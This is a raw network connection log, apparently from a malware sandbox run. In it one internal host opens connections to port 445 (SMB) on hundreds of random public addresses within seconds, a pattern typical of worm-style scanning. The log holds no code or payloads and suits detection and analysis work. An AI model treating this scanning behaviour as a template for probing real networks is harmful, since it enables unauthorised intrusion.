Apr 29, 2023 00:53:51.434684992 CEST	51638	445	192.168.2.4	183.213.8.170
Apr 29, 2023 00:53:51.438308954 CEST	51640	445	192.168.2.4	180.92.244.234
Apr 29, 2023 00:53:51.438369989 CEST	51641	445	192.168.2.4	9.24.67.148
Apr 29, 2023 00:53:51.438468933 CEST	51642	445	192.168.2.4	126.138.53.156
Apr 29, 2023 00:53:51.438576937 CEST	51643	445	192.168.2.4	111.142.44.90
Apr 29, 2023 00:53:51.438654900 CEST	51644	445	192.168.2.4	90.208.37.90
Apr 29, 2023 00:53:51.438744068 CEST	51645	445	192.168.2.4	22.129.246.5
Apr 29, 2023 00:53:51.538327932 CEST	51647	445	192.168.2.4	168.211.54.253
Apr 29, 2023 00:53:51.544106007 CEST	51648	445	192.168.2.4	184.124.113.29
Apr 29, 2023 00:53:51.544159889 CEST	51649	445	192.168.2.4	110.250.55.198
Apr 29, 2023 00:53:51.700249910 CEST	51650	445	192.168.2.4	49.238.211.30
Apr 29, 2023 00:53:51.700375080 CEST	51651	445	192.168.2.4	20.219.9.227
Apr 29, 2023 00:53:51.700623989 CEST	51652	445	192.168.2.4	218.176.43.42
Apr 29, 2023 00:53:51.825594902 CEST	51655	445	192.168.2.4	17.203.42.106
Apr 29, 2023 00:53:51.825594902 CEST	51656	445	192.168.2.4	111.152.228.157
Apr 29, 2023 00:53:51.919703007 CEST	51659	445	192.168.2.4	114.168.79.214
Apr 29, 2023 00:53:51.973434925 CEST	51660	445	192.168.2.4	62.78.90.197
Apr 29, 2023 00:53:51.973438978 CEST	51661	445	192.168.2.4	5.129.218.204
Apr 29, 2023 00:53:52.028881073 CEST	51663	445	192.168.2.4	128.68.249.99
Apr 29, 2023 00:53:52.029210091 CEST	51664	445	192.168.2.4	72.88.191.150
Apr 29, 2023 00:53:52.029519081 CEST	51665	445	192.168.2.4	98.236.143.13
Apr 29, 2023 00:53:52.029891014 CEST	51666	445	192.168.2.4	186.200.125.188
Apr 29, 2023 00:53:52.030625105 CEST	51668	445	192.168.2.4	55.86.118.87
Apr 29, 2023 00:53:52.294821978 CEST	51671	445	192.168.2.4	80.213.250.69
Apr 29, 2023 00:53:52.294826984 CEST	51672	445	192.168.2.4	37.126.111.17
Apr 29, 2023 00:53:52.295178890 CEST	51673	445	192.168.2.4	156.138.137.34
Apr 29, 2023 00:53:52.295478106 CEST	51674	445	192.168.2.4	54.243.137.241
Apr 29, 2023 00:53:52.295670033 CEST	51675	445	192.168.2.4	88.167.246.77
Apr 29, 2023 00:53:52.419074059 CEST	51680	445	192.168.2.4	135.77.8.136
Apr 29, 2023 00:53:52.419147015 CEST	51679	445	192.168.2.4	204.38.120.138
Apr 29, 2023 00:53:52.544625044 CEST	51682	445	192.168.2.4	43.57.181.167
Apr 29, 2023 00:53:52.547769070 CEST	51683	445	192.168.2.4	65.24.56.222
Apr 29, 2023 00:53:52.547930002 CEST	51684	445	192.168.2.4	59.58.196.235
Apr 29, 2023 00:53:52.548180103 CEST	51685	445	192.168.2.4	188.15.131.143
Apr 29, 2023 00:53:52.548204899 CEST	51686	445	192.168.2.4	208.163.210.126
Apr 29, 2023 00:53:52.548326969 CEST	51688	445	192.168.2.4	50.124.10.106
Apr 29, 2023 00:53:52.548362017 CEST	51687	445	192.168.2.4	166.61.138.228
Apr 29, 2023 00:53:52.548409939 CEST	51689	445	192.168.2.4	175.212.82.68
Apr 29, 2023 00:53:52.653498888 CEST	51691	445	192.168.2.4	120.174.183.164
Apr 29, 2023 00:53:52.669218063 CEST	51692	445	192.168.2.4	78.143.214.82
Apr 29, 2023 00:53:52.669492006 CEST	51693	445	192.168.2.4	43.35.129.88
Apr 29, 2023 00:53:52.826407909 CEST	51694	445	192.168.2.4	19.193.9.51
Apr 29, 2023 00:53:52.826595068 CEST	51695	445	192.168.2.4	12.74.134.25
Apr 29, 2023 00:53:52.826891899 CEST	51697	445	192.168.2.4	159.243.37.74
Apr 29, 2023 00:53:52.935292006 CEST	51699	445	192.168.2.4	161.230.178.110
Apr 29, 2023 00:53:52.935628891 CEST	51700	445	192.168.2.4	193.202.200.181
Apr 29, 2023 00:53:53.045160055 CEST	51703	445	192.168.2.4	104.167.185.50
Apr 29, 2023 00:53:53.075328112 CEST	51704	445	192.168.2.4	147.181.49.238
Apr 29, 2023 00:53:53.075390100 CEST	51705	445	192.168.2.4	157.58.8.9
Apr 29, 2023 00:53:53.154210091 CEST	51706	445	192.168.2.4	143.169.81.247
Apr 29, 2023 00:53:53.154468060 CEST	51707	445	192.168.2.4	140.69.108.22
Apr 29, 2023 00:53:53.154892921 CEST	51708	445	192.168.2.4	41.73.69.24
Apr 29, 2023 00:53:53.155093908 CEST	51709	445	192.168.2.4	13.84.250.220
Apr 29, 2023 00:53:53.155549049 CEST	51710	445	192.168.2.4	178.52.23.80
Apr 29, 2023 00:53:53.155878067 CEST	51712	445	192.168.2.4	214.69.176.80
Apr 29, 2023 00:53:53.419234991 CEST	51716	445	192.168.2.4	133.198.232.27
Apr 29, 2023 00:53:53.419281006 CEST	51715	445	192.168.2.4	151.171.221.140
Apr 29, 2023 00:53:53.419502020 CEST	51717	445	192.168.2.4	156.44.207.206
Apr 29, 2023 00:53:53.419508934 CEST	51718	445	192.168.2.4	151.198.254.118
Apr 29, 2023 00:53:53.419738054 CEST	51719	445	192.168.2.4	82.250.75.208
Apr 29, 2023 00:53:53.545219898 CEST	51723	445	192.168.2.4	40.69.174.206
Apr 29, 2023 00:53:53.545393944 CEST	51724	445	192.168.2.4	101.243.248.211
Apr 29, 2023 00:53:53.654090881 CEST	51725	445	192.168.2.4	105.88.52.20
Apr 29, 2023 00:53:53.671103001 CEST	51728	445	192.168.2.4	158.248.116.61
Apr 29, 2023 00:53:53.671303034 CEST	51729	445	192.168.2.4	149.228.254.1
Apr 29, 2023 00:53:53.671324968 CEST	51727	445	192.168.2.4	157.136.188.166
Apr 29, 2023 00:53:53.671345949 CEST	51731	445	192.168.2.4	3.111.50.214
Apr 29, 2023 00:53:53.671406984 CEST	51730	445	192.168.2.4	82.39.154.36
Apr 29, 2023 00:53:53.671415091 CEST	51732	445	192.168.2.4	34.246.40.167
Apr 29, 2023 00:53:53.671488047 CEST	51733	445	192.168.2.4	98.179.155.161
Apr 29, 2023 00:53:53.763300896 CEST	51735	445	192.168.2.4	41.69.197.160
Apr 29, 2023 00:53:53.794651031 CEST	51736	445	192.168.2.4	144.70.136.244
Apr 29, 2023 00:53:53.795209885 CEST	51737	445	192.168.2.4	30.193.11.132
Apr 29, 2023 00:53:53.964238882 CEST	51738	445	192.168.2.4	113.5.75.153
Apr 29, 2023 00:53:53.964324951 CEST	51739	445	192.168.2.4	133.45.187.129
Apr 29, 2023 00:53:53.965303898 CEST	51741	445	192.168.2.4	112.184.133.131
Apr 29, 2023 00:53:54.059998035 CEST	51744	445	192.168.2.4	153.18.38.212
Apr 29, 2023 00:53:54.060018063 CEST	51743	445	192.168.2.4	64.81.0.88
Apr 29, 2023 00:53:54.169688940 CEST	51747	445	192.168.2.4	24.26.104.191
Apr 29, 2023 00:53:54.200964928 CEST	51749	445	192.168.2.4	163.145.122.164
Apr 29, 2023 00:53:54.201142073 CEST	51750	445	192.168.2.4	108.22.131.198
Apr 29, 2023 00:53:54.278990030 CEST	51752	445	192.168.2.4	190.136.13.182
Apr 29, 2023 00:53:54.278989077 CEST	51751	445	192.168.2.4	169.148.124.26
Apr 29, 2023 00:53:54.279233932 CEST	51753	445	192.168.2.4	166.211.216.231
Apr 29, 2023 00:53:54.279541016 CEST	51754	445	192.168.2.4	97.212.249.136
Apr 29, 2023 00:53:54.279668093 CEST	51755	445	192.168.2.4	160.252.96.156
Apr 29, 2023 00:53:54.279856920 CEST	51756	445	192.168.2.4	35.146.191.11
Apr 29, 2023 00:53:54.529202938 CEST	51760	445	192.168.2.4	117.236.87.92
Apr 29, 2023 00:53:54.529544115 CEST	51761	445	192.168.2.4	88.113.71.197
Apr 29, 2023 00:53:54.529689074 CEST	51762	445	192.168.2.4	135.71.14.93
Apr 29, 2023 00:53:54.529938936 CEST	51763	445	192.168.2.4	183.57.97.119
Apr 29, 2023 00:53:54.530204058 CEST	51764	445	192.168.2.4	70.208.57.4
Apr 29, 2023 00:53:54.669733047 CEST	51768	445	192.168.2.4	8.192.141.216
Apr 29, 2023 00:53:54.670053959 CEST	51769	445	192.168.2.4	35.34.31.199
Apr 29, 2023 00:53:54.779553890 CEST	51770	445	192.168.2.4	129.105.209.25
Apr 29, 2023 00:53:54.799175978 CEST	51772	445	192.168.2.4	173.124.200.39
Apr 29, 2023 00:53:54.799854040 CEST	51773	445	192.168.2.4	160.232.87.111
Apr 29, 2023 00:53:54.800614119 CEST	51774	445	192.168.2.4	87.55.193.2
Apr 29, 2023 00:53:54.801167965 CEST	51775	445	192.168.2.4	138.231.15.38
Apr 29, 2023 00:53:54.801721096 CEST	51776	445	192.168.2.4	23.196.189.112
Apr 29, 2023 00:53:54.802479029 CEST	51777	445	192.168.2.4	207.230.71.31
Apr 29, 2023 00:53:54.803014040 CEST	51778	445	192.168.2.4	52.4.9.104
Apr 29, 2023 00:53:54.872729063 CEST	51780	445	192.168.2.4	100.93.164.16
Apr 29, 2023 00:53:54.934860945 CEST	51781	445	192.168.2.4	41.14.134.173
Apr 29, 2023 00:53:54.934884071 CEST	51782	445	192.168.2.4	178.218.17.110
Apr 29, 2023 00:53:55.079904079 CEST	51783	445	192.168.2.4	14.82.105.120
Apr 29, 2023 00:53:55.079983950 CEST	51784	445	192.168.2.4	24.8.197.196
Apr 29, 2023 00:53:55.080360889 CEST	51786	445	192.168.2.4	4.69.126.75
Apr 29, 2023 00:53:55.185807943 CEST	51788	445	192.168.2.4	203.76.148.95
Apr 29, 2023 00:53:55.186413050 CEST	51789	445	192.168.2.4	85.16.72.110
Apr 29, 2023 00:53:55.280684948 CEST	51792	445	192.168.2.4	50.127.119.250
Apr 29, 2023 00:53:55.325634956 CEST	51794	445	192.168.2.4	197.85.121.156
Apr 29, 2023 00:53:55.325850964 CEST	51795	445	192.168.2.4	86.184.69.126
Apr 29, 2023 00:53:55.403919935 CEST	51796	445	192.168.2.4	221.92.187.148
Apr 29, 2023 00:53:55.404098034 CEST	51797	445	192.168.2.4	157.8.215.108
Apr 29, 2023 00:53:55.404174089 CEST	51798	445	192.168.2.4	47.133.254.80
Apr 29, 2023 00:53:55.404257059 CEST	51799	445	192.168.2.4	139.50.169.85
Apr 29, 2023 00:53:55.404362917 CEST	51800	445	192.168.2.4	221.80.241.231
Apr 29, 2023 00:53:55.404434919 CEST	51801	445	192.168.2.4	17.241.1.181
Apr 29, 2023 00:53:55.639211893 CEST	51805	445	192.168.2.4	179.216.18.3
Apr 29, 2023 00:53:55.639451981 CEST	51806	445	192.168.2.4	175.62.111.82
Apr 29, 2023 00:53:55.639570951 CEST	51807	445	192.168.2.4	101.229.75.102
Apr 29, 2023 00:53:55.639713049 CEST	51808	445	192.168.2.4	10.101.217.74
Apr 29, 2023 00:53:55.639978886 CEST	51809	445	192.168.2.4	25.62.39.104
Apr 29, 2023 00:53:55.779170990 CEST	51813	445	192.168.2.4	16.20.35.6
Apr 29, 2023 00:53:55.779377937 CEST	51814	445	192.168.2.4	133.14.183.72
Apr 29, 2023 00:53:55.888362885 CEST	51815	445	192.168.2.4	143.23.185.75
Apr 29, 2023 00:53:55.920073032 CEST	51817	445	192.168.2.4	181.151.113.254
Apr 29, 2023 00:53:55.920614004 CEST	51818	445	192.168.2.4	32.58.137.139
Apr 29, 2023 00:53:55.921386003 CEST	51819	445	192.168.2.4	147.108.42.31
Apr 29, 2023 00:53:55.922051907 CEST	51820	445	192.168.2.4	134.216.102.155
Apr 29, 2023 00:53:55.922775984 CEST	51821	445	192.168.2.4	44.105.14.128
Apr 29, 2023 00:53:55.923368931 CEST	51822	445	192.168.2.4	25.5.93.111
Apr 29, 2023 00:53:55.924067974 CEST	51823	445	192.168.2.4	150.161.97.124
Apr 29, 2023 00:53:55.981981039 CEST	51825	445	192.168.2.4	216.181.221.28
Apr 29, 2023 00:53:56.044506073 CEST	51827	445	192.168.2.4	160.241.240.202
Apr 29, 2023 00:53:56.044600010 CEST	51826	445	192.168.2.4	160.253.244.233
Apr 29, 2023 00:53:56.185503006 CEST	51828	445	192.168.2.4	163.162.129.144
Apr 29, 2023 00:53:56.186975956 CEST	51829	445	192.168.2.4	80.201.109.226
Apr 29, 2023 00:53:56.188640118 CEST	51831	445	192.168.2.4	177.218.118.241
Apr 29, 2023 00:53:56.310199976 CEST	51835	445	192.168.2.4	200.187.66.75
Apr 29, 2023 00:53:56.310272932 CEST	51834	445	192.168.2.4	114.29.30.230
Apr 29, 2023 00:53:56.388276100 CEST	51838	445	192.168.2.4	132.135.202.112
Apr 29, 2023 00:53:56.435669899 CEST	51840	445	192.168.2.4	223.3.94.20
Apr 29, 2023 00:53:56.435894012 CEST	51841	445	192.168.2.4	210.226.48.111
Apr 29, 2023 00:53:56.514009953 CEST	51843	445	192.168.2.4	155.171.188.59
Apr 29, 2023 00:53:56.514009953 CEST	51842	445	192.168.2.4	88.63.174.122
Apr 29, 2023 00:53:56.514261961 CEST	51844	445	192.168.2.4	101.74.184.41
Apr 29, 2023 00:53:56.514405012 CEST	51845	445	192.168.2.4	174.124.228.210
Apr 29, 2023 00:53:56.514600992 CEST	51846	445	192.168.2.4	222.226.13.208
Apr 29, 2023 00:53:56.514697075 CEST	51847	445	192.168.2.4	126.12.197.80
Apr 29, 2023 00:53:56.763541937 CEST	51851	445	192.168.2.4	178.81.112.64
Apr 29, 2023 00:53:56.763796091 CEST	51852	445	192.168.2.4	176.90.33.66
Apr 29, 2023 00:53:56.763992071 CEST	51853	445	192.168.2.4	103.225.151.73
Apr 29, 2023 00:53:56.764122963 CEST	51854	445	192.168.2.4	181.37.17.118
Apr 29, 2023 00:53:56.764408112 CEST	51855	445	192.168.2.4	5.114.131.103
Apr 29, 2023 00:53:56.904266119 CEST	51860	445	192.168.2.4	194.189.94.149
Apr 29, 2023 00:53:56.904264927 CEST	51859	445	192.168.2.4	88.45.127.33
Apr 29, 2023 00:53:57.014631987 CEST	51861	445	192.168.2.4	4.155.97.220
Apr 29, 2023 00:53:57.046698093 CEST	51863	445	192.168.2.4	159.244.131.11
Apr 29, 2023 00:53:57.046740055 CEST	51864	445	192.168.2.4	49.15.121.250
Apr 29, 2023 00:53:57.046829939 CEST	51865	445	192.168.2.4	61.25.247.26
Apr 29, 2023 00:53:57.046889067 CEST	51867	445	192.168.2.4	117.172.8.208
Apr 29, 2023 00:53:57.046914101 CEST	51866	445	192.168.2.4	160.227.86.24
Apr 29, 2023 00:53:57.046926022 CEST	51868	445	192.168.2.4	25.22.121.91
Apr 29, 2023 00:53:57.046972036 CEST	51869	445	192.168.2.4	54.62.38.133
Apr 29, 2023 00:53:57.107983112 CEST	51871	445	192.168.2.4	27.228.120.121
Apr 29, 2023 00:53:57.173765898 CEST	51872	445	192.168.2.4	150.197.23.163
Apr 29, 2023 00:53:57.173907042 CEST	51873	445	192.168.2.4	209.171.203.84
Apr 29, 2023 00:53:57.310833931 CEST	51875	445	192.168.2.4	163.206.117.137
Apr 29, 2023 00:53:57.310842991 CEST	51874	445	192.168.2.4	40.47.72.29
Apr 29, 2023 00:53:57.311145067 CEST	51877	445	192.168.2.4	41.38.27.53
Apr 29, 2023 00:53:57.435703993 CEST	51880	445	192.168.2.4	106.15.169.249
Apr 29, 2023 00:53:57.435848951 CEST	51881	445	192.168.2.4	70.247.146.199
Apr 29, 2023 00:53:57.513384104 CEST	51884	445	192.168.2.4	27.212.18.99
Apr 29, 2023 00:53:57.560156107 CEST	51886	445	192.168.2.4	208.9.98.234
Apr 29, 2023 00:53:57.560219049 CEST	51887	445	192.168.2.4	29.143.81.80
Apr 29, 2023 00:53:57.638819933 CEST	51888	445	192.168.2.4	25.252.7.223
Apr 29, 2023 00:53:57.638991117 CEST	51889	445	192.168.2.4	197.149.231.26
Apr 29, 2023 00:53:57.639106989 CEST	51890	445	192.168.2.4	26.160.17.239
Apr 29, 2023 00:53:57.639230013 CEST	51891	445	192.168.2.4	120.249.175.61
Apr 29, 2023 00:53:57.639332056 CEST	51892	445	192.168.2.4	96.208.44.164
Apr 29, 2023 00:53:57.639468908 CEST	51893	445	192.168.2.4	22.100.32.112
Apr 29, 2023 00:53:57.905942917 CEST	51898	445	192.168.2.4	2.203.241.106
Apr 29, 2023 00:53:57.905967951 CEST	51897	445	192.168.2.4	28.128.142.58
Apr 29, 2023 00:53:57.906184912 CEST	51900	445	192.168.2.4	111.16.128.143
Apr 29, 2023 00:53:57.906259060 CEST	51899	445	192.168.2.4	160.177.222.110
Apr 29, 2023 00:53:57.906569004 CEST	51902	445	192.168.2.4	221.174.243.57
Apr 29, 2023 00:53:58.029453993 CEST	51905	445	192.168.2.4	108.235.216.236
Apr 29, 2023 00:53:58.029613972 CEST	51904	445	192.168.2.4	29.207.10.176
Apr 29, 2023 00:53:58.138854027 CEST	51907	445	192.168.2.4	50.72.116.9
Apr 29, 2023 00:53:58.171751022 CEST	51910	445	192.168.2.4	74.155.54.185
Apr 29, 2023 00:53:58.171760082 CEST	51909	445	192.168.2.4	198.64.152.222
Apr 29, 2023 00:53:58.172028065 CEST	51911	445	192.168.2.4	114.20.202.24
Apr 29, 2023 00:53:58.172049999 CEST	51912	445	192.168.2.4	58.132.251.25
Apr 29, 2023 00:53:58.172118902 CEST	51913	445	192.168.2.4	118.12.212.25
Apr 29, 2023 00:53:58.172364950 CEST	51914	445	192.168.2.4	172.103.114.18
Apr 29, 2023 00:53:58.185803890 CEST	51915	445	192.168.2.4	140.6.190.9
Apr 29, 2023 00:53:58.216664076 CEST	51917	445	192.168.2.4	135.111.197.234
Apr 29, 2023 00:53:58.294836044 CEST	51919	445	192.168.2.4	51.71.52.147
Apr 29, 2023 00:53:58.295088053 CEST	51920	445	192.168.2.4	154.26.49.114
Apr 29, 2023 00:53:58.331684113 CEST	445	51920	154.26.49.114	192.168.2.4
Apr 29, 2023 00:53:58.435857058 CEST	51921	445	192.168.2.4	39.149.121.50
Apr 29, 2023 00:53:58.436068058 CEST	51922	445	192.168.2.4	142.25.51.182
Apr 29, 2023 00:53:58.436753035 CEST	51924	445	192.168.2.4	120.71.120.137
Apr 29, 2023 00:53:58.545066118 CEST	51927	445	192.168.2.4	68.64.55.40
Apr 29, 2023 00:53:58.545285940 CEST	51928	445	192.168.2.4	106.88.228.150
Apr 29, 2023 00:53:58.623028994 CEST	51931	445	192.168.2.4	175.115.196.58
Apr 29, 2023 00:53:58.670177937 CEST	51933	445	192.168.2.4	2.85.60.222
Apr 29, 2023 00:53:58.670372009 CEST	51934	445	192.168.2.4	48.244.151.129
Apr 29, 2023 00:53:58.748097897 CEST	51935	445	192.168.2.4	112.97.133.215
Apr 29, 2023 00:53:58.748186111 CEST	51936	445	192.168.2.4	115.229.62.119
Apr 29, 2023 00:53:58.748362064 CEST	51937	445	192.168.2.4	107.86.81.210
Apr 29, 2023 00:53:58.748825073 CEST	51938	445	192.168.2.4	60.149.73.57
Apr 29, 2023 00:53:58.748985052 CEST	51939	445	192.168.2.4	156.86.66.24
Apr 29, 2023 00:53:58.749236107 CEST	51940	445	192.168.2.4	100.134.172.253
Apr 29, 2023 00:53:58.841223955 CEST	51920	445	192.168.2.4	154.26.49.114
Apr 29, 2023 00:53:58.877990007 CEST	445	51920	154.26.49.114	192.168.2.4
Apr 29, 2023 00:53:59.033699036 CEST	51944	445	192.168.2.4	163.48.53.227
Apr 29, 2023 00:53:59.033866882 CEST	51945	445	192.168.2.4	53.245.154.185
Apr 29, 2023 00:53:59.033989906 CEST	51946	445	192.168.2.4	75.48.125.51
Apr 29, 2023 00:53:59.034198999 CEST	51947	445	192.168.2.4	201.229.139.86
Apr 29, 2023 00:53:59.034503937 CEST	51949	445	192.168.2.4	67.110.204.119
Apr 29, 2023 00:53:59.044867992 CEST	445	51938	60.149.73.57	192.168.2.4
Apr 29, 2023 00:53:59.154036045 CEST	51951	445	192.168.2.4	45.4.142.233
Apr 29, 2023 00:53:59.154177904 CEST	51952	445	192.168.2.4	37.106.54.198
Apr 29, 2023 00:53:59.247775078 CEST	51955	445	192.168.2.4	79.129.100.248
Apr 29, 2023 00:53:59.296427965 CEST	51956	445	192.168.2.4	206.222.14.228
Apr 29, 2023 00:53:59.296629906 CEST	51957	445	192.168.2.4	196.240.104.51
Apr 29, 2023 00:53:59.296927929 CEST	51958	445	192.168.2.4	124.250.117.235
Apr 29, 2023 00:53:59.297019005 CEST	51959	445	192.168.2.4	126.0.5.45
Apr 29, 2023 00:53:59.297118902 CEST	51960	445	192.168.2.4	209.241.38.94
Apr 29, 2023 00:53:59.297271967 CEST	51961	445	192.168.2.4	136.75.0.205
Apr 29, 2023 00:53:59.315838099 CEST	51962	445	192.168.2.4	220.93.14.183
Apr 29, 2023 00:53:59.326375961 CEST	51965	445	192.168.2.4	209.88.159.237
Apr 29, 2023 00:53:59.333901882 CEST	445	51957	196.240.104.51	192.168.2.4
Apr 29, 2023 00:53:59.419869900 CEST	51967	445	192.168.2.4	12.193.85.78
Apr 29, 2023 00:53:59.419869900 CEST	51966	445	192.168.2.4	97.207.70.194
Apr 29, 2023 00:53:59.544387102 CEST	51938	445	192.168.2.4	60.149.73.57
Apr 29, 2023 00:53:59.561590910 CEST	51970	445	192.168.2.4	169.125.123.77
Apr 29, 2023 00:53:59.561597109 CEST	51969	445	192.168.2.4	164.54.88.70
Apr 29, 2023 00:53:59.561789036 CEST	51972	445	192.168.2.4	103.193.188.108
Apr 29, 2023 00:53:59.601149082 CEST	445	51959	126.0.5.45	192.168.2.4
Apr 29, 2023 00:53:59.670350075 CEST	51974	445	192.168.2.4	86.195.121.215
Apr 29, 2023 00:53:59.670568943 CEST	51975	445	192.168.2.4	74.157.54.35
Apr 29, 2023 00:53:59.748317003 CEST	51978	445	192.168.2.4	188.196.144.222
Apr 29, 2023 00:53:59.794652939 CEST	51980	445	192.168.2.4	94.220.213.102
Apr 29, 2023 00:53:59.794673920 CEST	51981	445	192.168.2.4	14.120.221.40
Apr 29, 2023 00:53:59.840682030 CEST	445	51938	60.149.73.57	192.168.2.4
Apr 29, 2023 00:53:59.841295958 CEST	51957	445	192.168.2.4	196.240.104.51
Apr 29, 2023 00:53:59.873203039 CEST	51983	445	192.168.2.4	202.217.2.22
Apr 29, 2023 00:53:59.873208046 CEST	51984	445	192.168.2.4	152.59.192.213
Apr 29, 2023 00:53:59.873406887 CEST	51985	445	192.168.2.4	197.54.155.140
Apr 29, 2023 00:53:59.873568058 CEST	51986	445	192.168.2.4	16.196.84.195
Apr 29, 2023 00:53:59.873739958 CEST	51987	445	192.168.2.4	197.169.135.10
Apr 29, 2023 00:53:59.873915911 CEST	51988	445	192.168.2.4	101.75.41.74
Apr 29, 2023 00:53:59.878704071 CEST	445	51957	196.240.104.51	192.168.2.4
Apr 29, 2023 00:54:00.106966019 CEST	51959	445	192.168.2.4	126.0.5.45
Apr 29, 2023 00:54:00.138576031 CEST	51991	445	192.168.2.4	77.214.179.56
Apr 29, 2023 00:54:00.138952017 CEST	51993	445	192.168.2.4	137.164.131.38
Apr 29, 2023 00:54:00.139173985 CEST	51995	445	192.168.2.4	222.83.218.93
Apr 29, 2023 00:54:00.139225006 CEST	51996	445	192.168.2.4	37.192.51.37
Apr 29, 2023 00:54:00.139492989 CEST	51997	445	192.168.2.4	111.169.144.60
Apr 29, 2023 00:54:00.371566057 CEST	51999	445	192.168.2.4	106.177.38.63
Apr 29, 2023 00:54:00.371723890 CEST	52000	445	192.168.2.4	180.3.180.146
Apr 29, 2023 00:54:00.376764059 CEST	52002	445	192.168.2.4	183.178.100.176
Apr 29, 2023 00:54:00.404480934 CEST	445	51959	126.0.5.45	192.168.2.4
Apr 29, 2023 00:54:00.569997072 CEST	52004	445	192.168.2.4	110.174.160.236
Apr 29, 2023 00:54:00.570714951 CEST	52007	445	192.168.2.4	142.191.51.232
Apr 29, 2023 00:54:00.571158886 CEST	52008	445	192.168.2.4	154.175.56.138
Apr 29, 2023 00:54:00.571702957 CEST	52009	445	192.168.2.4	19.9.196.218
Apr 29, 2023 00:54:00.572091103 CEST	52010	445	192.168.2.4	67.151.170.11
Apr 29, 2023 00:54:00.572590113 CEST	52011	445	192.168.2.4	157.12.218.226
Apr 29, 2023 00:54:00.572968960 CEST	52012	445	192.168.2.4	175.109.161.151
Apr 29, 2023 00:54:00.573514938 CEST	52013	445	192.168.2.4	156.20.66.37
Apr 29, 2023 00:54:00.675093889 CEST	52015	445	192.168.2.4	205.135.167.168
Apr 29, 2023 00:54:00.675112963 CEST	52014	445	192.168.2.4	13.170.219.231
Apr 29, 2023 00:54:00.749098063 CEST	52017	445	192.168.2.4	213.121.50.85
Apr 29, 2023 00:54:00.749209881 CEST	52018	445	192.168.2.4	143.10.71.125
Apr 29, 2023 00:54:00.749711990 CEST	52020	445	192.168.2.4	103.67.179.183
Apr 29, 2023 00:54:00.857523918 CEST	52022	445	192.168.2.4	2.195.206.76
Apr 29, 2023 00:54:00.857527018 CEST	52023	445	192.168.2.4	3.121.246.82
Apr 29, 2023 00:54:00.873054028 CEST	52026	445	192.168.2.4	198.249.147.29
Apr 29, 2023 00:54:00.967052937 CEST	52028	445	192.168.2.4	92.45.73.49
Apr 29, 2023 00:54:00.967236042 CEST	52029	445	192.168.2.4	67.248.125.206
Apr 29, 2023 00:54:01.002993107 CEST	52030	445	192.168.2.4	181.174.52.81
Apr 29, 2023 00:54:01.003144979 CEST	52031	445	192.168.2.4	190.139.90.197
Apr 29, 2023 00:54:01.003257990 CEST	52032	445	192.168.2.4	102.48.42.164
Apr 29, 2023 00:54:01.003353119 CEST	52033	445	192.168.2.4	115.154.49.114
Apr 29, 2023 00:54:01.003532887 CEST	52034	445	192.168.2.4	34.17.225.60
Apr 29, 2023 00:54:01.003637075 CEST	52035	445	192.168.2.4	42.215.188.192
Apr 29, 2023 00:54:01.294974089 CEST	52039	445	192.168.2.4	96.218.217.167
Apr 29, 2023 00:54:01.295527935 CEST	52041	445	192.168.2.4	3.26.220.235
Apr 29, 2023 00:54:01.295686007 CEST	52043	445	192.168.2.4	129.147.10.69
Apr 29, 2023 00:54:01.295834064 CEST	52044	445	192.168.2.4	171.235.251.182
Apr 29, 2023 00:54:01.296242952 CEST	52045	445	192.168.2.4	125.112.108.70
Apr 29, 2023 00:54:01.700958014 CEST	49678	443	192.168.2.4	40.126.32.67
Apr 29, 2023 00:54:01.810360909 CEST	49680	443	192.168.2.4	40.126.32.67
Apr 29, 2023 00:54:01.857222080 CEST	49679	443	192.168.2.4	40.126.32.67
Apr 29, 2023 00:54:02.204586029 CEST	52047	445	192.168.2.4	78.78.43.194
Apr 29, 2023 00:54:02.204884052 CEST	52049	445	192.168.2.4	113.102.244.31
Apr 29, 2023 00:54:02.205440044 CEST	52051	445	192.168.2.4	145.170.61.126
Apr 29, 2023 00:54:02.206340075 CEST	52052	445	192.168.2.4	144.80.52.37
Apr 29, 2023 00:54:02.207303047 CEST	52053	445	192.168.2.4	20.37.123.218
Apr 29, 2023 00:54:02.208287954 CEST	52054	445	192.168.2.4	109.115.240.160
Apr 29, 2023 00:54:02.209230900 CEST	52055	445	192.168.2.4	153.209.234.58
Apr 29, 2023 00:54:02.210012913 CEST	52056	445	192.168.2.4	22.70.245.67
Apr 29, 2023 00:54:02.311070919 CEST	52060	445	192.168.2.4	189.74.71.34
Apr 29, 2023 00:54:02.311070919 CEST	52059	445	192.168.2.4	20.250.216.148
Apr 29, 2023 00:54:02.311286926 CEST	52061	445	192.168.2.4	167.244.103.245
Apr 29, 2023 00:54:02.311486006 CEST	52062	445	192.168.2.4	98.102.208.212
Apr 29, 2023 00:54:02.311738014 CEST	52063	445	192.168.2.4	52.68.87.191
Apr 29, 2023 00:54:02.311954975 CEST	52064	445	192.168.2.4	174.209.87.233
Apr 29, 2023 00:54:02.312361002 CEST	52066	445	192.168.2.4	146.188.31.90
Apr 29, 2023 00:54:02.312597990 CEST	52067	445	192.168.2.4	60.98.156.173
Apr 29, 2023 00:54:02.313076019 CEST	52069	445	192.168.2.4	89.19.143.7
Apr 29, 2023 00:54:02.313442945 CEST	52070	445	192.168.2.4	70.148.144.98
Apr 29, 2023 00:54:02.313764095 CEST	52071	445	192.168.2.4	163.228.146.228
Apr 29, 2023 00:54:02.314634085 CEST	52075	445	192.168.2.4	60.192.241.113
Apr 29, 2023 00:54:02.314862967 CEST	52076	445	192.168.2.4	140.147.30.15
Apr 29, 2023 00:54:02.315412998 CEST	52078	445	192.168.2.4	104.178.211.65
Apr 29, 2023 00:54:02.315818071 CEST	52080	445	192.168.2.4	26.192.254.133
Apr 29, 2023 00:54:02.316162109 CEST	52081	445	192.168.2.4	41.5.250.34
Apr 29, 2023 00:54:02.316488981 CEST	52082	445	192.168.2.4	186.205.136.232
Apr 29, 2023 00:54:02.317838907 CEST	52085	445	192.168.2.4	58.89.10.146
Apr 29, 2023 00:54:02.318959951 CEST	52086	445	192.168.2.4	203.38.117.73
Apr 29, 2023 00:54:02.420790911 CEST	52088	445	192.168.2.4	50.173.91.146
Apr 29, 2023 00:54:02.421238899 CEST	52090	445	192.168.2.4	37.118.162.182
Apr 29, 2023 00:54:02.421694994 CEST	52092	445	192.168.2.4	218.67.200.80
Apr 29, 2023 00:54:02.421977043 CEST	52093	445	192.168.2.4	79.217.74.96
Apr 29, 2023 00:54:02.422358036 CEST	52094	445	192.168.2.4	69.84.89.230
Apr 29, 2023 00:54:02.606597900 CEST	445	52067	60.98.156.173	192.168.2.4
Apr 29, 2023 00:54:03.294780016 CEST	52067	445	192.168.2.4	60.98.156.173
